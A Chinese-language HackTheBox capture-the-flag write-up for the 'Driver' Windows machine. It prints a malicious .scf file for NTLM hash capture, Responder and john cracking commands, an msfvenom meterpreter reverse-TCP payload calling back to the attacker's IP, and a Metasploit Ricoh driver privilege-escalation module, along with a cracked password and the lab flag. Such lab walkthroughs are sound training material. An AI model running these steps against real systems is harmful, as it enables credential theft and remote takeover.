目錄

連接至HTB服務(wù)器并啟動靶機(jī)

信息收集

使用rustscan對靶機(jī)TCP端口進(jìn)行開放掃描

將靶機(jī)TCP開放端口號提取并保存

使用nmap對靶機(jī)TCP開放端口進(jìn)行腳本、服務(wù)掃描

使用nmap對靶機(jī)TCP開放端口進(jìn)行漏洞、系統(tǒng)掃描

使用nmap對靶機(jī)常用UDP端口進(jìn)行開放掃描

使用smbclient嘗試root用戶空密碼登錄靶機(jī)SMB服務(wù)

邊界突破

使用瀏覽器訪問靶機(jī)80端口

使用Yakit抓取請求包

仿照該憑證格式，使用字典嘗試爆破密碼

使用上述憑證通過該頁面認(rèn)證后進(jìn)入面板

嘗試上傳.scf文件利用SMB反射獲取用戶憑證

使用responder開始欺騙及監(jiān)聽客戶端

將該哈希值寫入文件以便爆破

使用john對該哈希文件進(jìn)行字典爆破

使用evil-winrm通過上述憑證登錄靶機(jī)Win-RM服務(wù)

權(quán)限提升

查看靶機(jī)C盤根目錄

查看靶機(jī)系統(tǒng)內(nèi)用戶

查看當(dāng)前用戶賬戶信息

查看當(dāng)前用戶權(quán)限信息

查看當(dāng)前用戶PS歷史記錄

查找該驅(qū)動所在目錄路徑

?使用大模型搜索該驅(qū)動是否存在提權(quán)漏洞

使用searchsploit搜索該漏洞

使用msfvenom生成Payload

將該P(yáng)ayload上傳至靶機(jī)中

啟動Metasploit

檢索該漏洞模塊

---

連接至HTB服務(wù)器并啟動靶機(jī)

靶機(jī)IP：10.10.11.106

分配IP：10.10.16.13

---

信息收集

使用rustscan對靶機(jī)TCP端口進(jìn)行開放掃描

rustscan -a 10.10.11.106 -r 1-65535 --ulimit 5000 | tee res

將靶機(jī)TCP開放端口號提取并保存

ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)

┌──(root?kali)-[/home/kali/Desktop/temp]
└─# grep ^[0-9] res | cut -d/ -f1 | paste -sd,??????? ?
80,135,445,5985
????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ?
┌──(root?kali)-[/home/kali/Desktop/temp]
└─# ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)
????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ?
┌──(root?kali)-[/home/kali/Desktop/temp]
└─# echo $ports
80,135,445,5985

使用nmap對靶機(jī)TCP開放端口進(jìn)行腳本、服務(wù)掃描

nmap -sT -p$ports -sCV -Pn 10.10.11.106

• 需要重點(diǎn)關(guān)注的端口和服務(wù)

80端口：IIS服務(wù)

445端口：SMB服務(wù)

5985端口：Win-RM服務(wù)

使用nmap對靶機(jī)TCP開放端口進(jìn)行漏洞、系統(tǒng)掃描

nmap -sT -p$ports --script=vuln -O -Pn 10.10.11.106

使用nmap對靶機(jī)常用UDP端口進(jìn)行開放掃描

nmap -sU --top-ports 20 -Pn 10.10.11.106

使用smbclient嘗試root用戶空密碼登錄靶機(jī)SMB服務(wù)

smbclient -L \\10.10.11.106

┌──(root?kali)-[/home/kali/Desktop/temp]
└─# smbclient -L \\10.10.11.106
Password for [WORKGROUP\root]:
session setup failed: NT_STATUS_ACCESS_DENIED

---

邊界突破

使用瀏覽器訪問靶機(jī)80端口

• 提示需要用戶名和密碼

使用Yakit抓取請求包

• 其中，請求頭中的Authorization參數(shù)用于發(fā)送憑證

• 對Basic后的字符串進(jìn)行解碼

仿照該憑證格式，使用字典嘗試爆破密碼

Authorization: Basic YWRtaW46YWRtaW4=

• Base64解碼后

賬戶：admin

密碼：admin

• 將靶機(jī)IP與主域名進(jìn)行綁定使DNS從本地解析

sed -i '1i 10.10.11.106 driver.htb' /etc/hosts

┌──(root?kali)-[/home/kali/Desktop/temp]
└─# sed -i '1i 10.10.11.106 driver.htb' /etc/hosts
??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ?
┌──(root?kali)-[/home/kali/Desktop/temp]
└─# head -n1 /etc/hosts????????????????????????? ?
10.10.11.106 driver.htb

使用上述憑證通過該頁面認(rèn)證后進(jìn)入面板

• 這里不知道為啥加載出來是這樣的，反正也是轉(zhuǎn)了半天

• 點(diǎn)擊左上角的Firmware Updates進(jìn)入固件更新頁，該頁允許文件上傳

• 該頁面中存在描述：Select printer model and upload the respective firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon.

翻譯：選擇打印機(jī)型號并將相應(yīng)的固件更新上傳到我們的文件共享。我們的測試團(tuán)隊(duì)將手動審查上傳并盡快啟動測試。

• 因此，從這里上傳的所有文件應(yīng)當(dāng)都會保存在靶機(jī)SMB服務(wù)器中，換句話說通過該頁面我們擁有了向靶機(jī)SMB服務(wù)器寫入文件的權(quán)限

嘗試上傳.scf文件利用SMB反射獲取用戶憑證

基于SCF文件的SMB中繼攻擊：攻擊者上傳精心構(gòu)造的惡意.scf文件到SMB服務(wù)器共享目錄，用戶瀏覽該目錄時(shí)，系統(tǒng)自動解析.scf文件觸發(fā)向惡意服務(wù)器的訪問請求，進(jìn)而以用戶身份發(fā)送NTLMv2認(rèn)證請求，攻擊者截獲并獲取該用戶的NTLMv2憑證 。

• 構(gòu)造一個(gè)惡意的.scf文件

[Shell]    
Command=2    
IconFile=\\10.10.16.13\test

使用responder開始欺騙及監(jiān)聽客戶端

responder -wv -I tun0

• 選擇文件后，點(diǎn)擊Submit開始上傳

• 攻擊機(jī)responder收到回顯

• tony用戶哈希值

tony::DRIVER:cc7a5be9edf57e2b:B00C7598710E1FEB3662800CB261B7F3:0101000000000000009AE12B6165DB0140FB9FA2F3FF07460000000002000800420050005000370001001E00570049004E002D004100530034003900330053004C004C0046004300390004003400570049004E002D004100530034003900330053004C004C004600430039002E0042005000500037002E004C004F00430041004C000300140042005000500037002E004C004F00430041004C000500140042005000500037002E004C004F00430041004C0007000800009AE12B6165DB010600040002000000080030003000000000000000000000000020000092420DE18E3028DCAC604904C0367CAEF10C3B61D875F7E0ADB1D86EE62E88D90A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E0031003300000000000000000000000000

將該哈希值寫入文件以便爆破

echo 'tony::DRIVER:cc7a5be9edf57e2b:B00C7598710E1FEB3662800CB261B7F3:0101000000000000009AE12B6165DB0140FB9FA2F3FF07460000000002000800420050005000370001001E00570049004E002D004100530034003900330053004C004C0046004300390004003400570049004E002D004100530034003900330053004C004C004600430039002E0042005000500037002E004C004F00430041004C000300140042005000500037002E004C004F00430041004C000500140042005000500037002E004C004F00430041004C0007000800009AE12B6165DB010600040002000000080030003000000000000000000000000020000092420DE18E3028DCAC604904C0367CAEF10C3B61D875F7E0ADB1D86EE62E88D90A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E0031003300000000000000000000000000' > hash

使用john對該哈希文件進(jìn)行字典爆破

john hash --wordlist=../dictionary/rockyou.txt

賬戶：tony

密碼：liltony

使用evil-winrm通過上述憑證登錄靶機(jī)Win-RM服務(wù)

evil-winrm -i 10.10.11.106 -u 'tony' -p 'liltony'

• 在C:\Users\tony\Desktop目錄下找到user.txt文件

---

權(quán)限提升

查看靶機(jī)C盤根目錄

• 可見存在兩個(gè)Program Files目錄，因此靶機(jī)系統(tǒng)大概率為64位系統(tǒng)

查看靶機(jī)系統(tǒng)內(nèi)用戶

net user

• 靶機(jī)系統(tǒng)內(nèi)普通權(quán)限用戶僅有該用戶

查看當(dāng)前用戶賬戶信息

net user tony

• 該用戶沒有加入特殊權(quán)限組

查看當(dāng)前用戶權(quán)限信息

whoami /priv

• 沒有可利用的特權(quán)

查看當(dāng)前用戶PS歷史記錄

type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

*Evil-WinRM* PS C:\Users\tony\Desktop> type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Add-Printer -PrinterName "RICOH_PCL6" -DriverName 'RICOH PCL6 UniversalDriver V4.23' -PortName 'lpt1:'

ping 1.1.1.1
ping 1.1.1.1

• Powershell歷史記錄中第一條命令整體功能為，向系統(tǒng)添加一個(gè)打印機(jī)，其中驅(qū)動完整名稱：`RICOH PCL6 UniversalDriver V4.23`

查找該驅(qū)動所在目錄路徑

cmd /c dir /s /ad "RICOH PCL6 UniversalDriver V4.23"

• 該驅(qū)動所在位置：C:\ProgramData\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23

?使用大模型搜索該驅(qū)動是否存在提權(quán)漏洞

使用searchsploit搜索該漏洞

searchsploit --cve 2019-19363

• 由輸出可見，該漏洞集成于MSF中

使用msfvenom生成Payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.13 LPORT=1425 -f exe > shell.exe

┌──(root?kali)-[/home/kali/Desktop/temp]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.13 LPORT=1425 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes

將該P(yáng)ayload上傳至靶機(jī)中

upload shell.exe

啟動Metasploit

msfconsole

• 切換到監(jiān)聽模塊

use exploit/multi/handler

• 配置好選項(xiàng)：LHOST、LPORT、PAYLOAD，并開始監(jiān)聽

msf6 exploit(multi/handler) > set LHOST 10.10.16.13
LHOST => 10.10.16.13
msf6 exploit(multi/handler) > set LPORT 1425
LPORT => 1425
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.13:1425

• 控制靶機(jī)運(yùn)行Payload

.\shell.exe

• 攻擊機(jī)MSF監(jiān)聽端收到回顯

[*] Started reverse TCP handler on 10.10.16.13:1425
[*] Sending stage (203846 bytes) to 10.10.11.106
[*] Meterpreter session 1 opened (10.10.16.13:1425 -> 10.10.11.106:49431) at 2025-01-13 04:44:35 -0500

meterpreter >

• 列出靶機(jī)系統(tǒng)進(jìn)程

ps

• 通過Session欄目判斷，為0則是系統(tǒng)進(jìn)程，為1則是用戶進(jìn)程。我嘗試將Meterpreter遷移進(jìn)用戶進(jìn)程explorer.exe中

migrate -N explorer.exe

meterpreter > migrate -N explorer.exe
[*] Migrating from 4256 to 3260...
[*] Migration completed successfully.

檢索該漏洞模塊

search 2019-19363

• 切換到該模塊

use exploit/windows/local/ricoh_driver_privesc

• 列出該模塊所需填寫的選項(xiàng)

show options

• 此處需要配置好的選項(xiàng)：LHOST、LPORT、PAYLOAD、SESSION

msf6 exploit(windows/local/ricoh_driver_privesc) > set LHOST 10.10.16.13
LHOST => 10.10.16.13
msf6 exploit(windows/local/ricoh_driver_privesc) > set LPORT 1426
LPORT => 1426
msf6 exploit(windows/local/ricoh_driver_privesc) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ricoh_driver_privesc) > set SESSION 1
SESSION => 1

• 執(zhí)行該模塊

exploit

• 查找root.txt文件位置

search -f root.txt

meterpreter > search -f root.txt
Found 1 result...
=================

Path???????????????????????????????????? Size (bytes)? Modified (UTC)
----???????????????????????????????????? ------------? --------------
c:\Users\Administrator\Desktop\root.txt? 34??????????? 2025-01-13 05:55:59 -0500

• 查看root.txt文件內(nèi)容

meterpreter > shell
Process 1876 created.
Channel 2 created.
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\system32>type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt
030cd5d04a90f1bd3c163e0bcd3280eb